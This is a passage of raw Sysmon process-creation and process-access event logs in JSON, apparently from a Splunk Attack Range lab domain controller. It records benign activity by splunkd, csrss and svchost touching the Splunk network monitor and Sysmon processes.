05:52:52.363","ProcessGuid":"{A837DB8D-0334-5F25-0000-00101AC60A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:52:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5693,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:52.360\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-02FA-5F25-0000-00100C370600}\r\nTargetProcessId: 1344\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:52.360","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-02FA-5F25-0000-00100C370600}","TargetProcessId":"1344","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5694,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:52.360\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-02FA-5F25-0000-00100C370600}\r\nTargetProcessId: 1344\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:52.360","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-02FA-5F25-0000-00100C370600}","TargetProcessId":"1344","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5695,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:52.360\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:52.360","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5696,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:52.360\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:52.360","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5697,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:52.360\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:52.360","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5698,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:52.360\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:52.360","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5699,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:52.360\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:52.360","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5700,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:52.360\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:52.360","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.d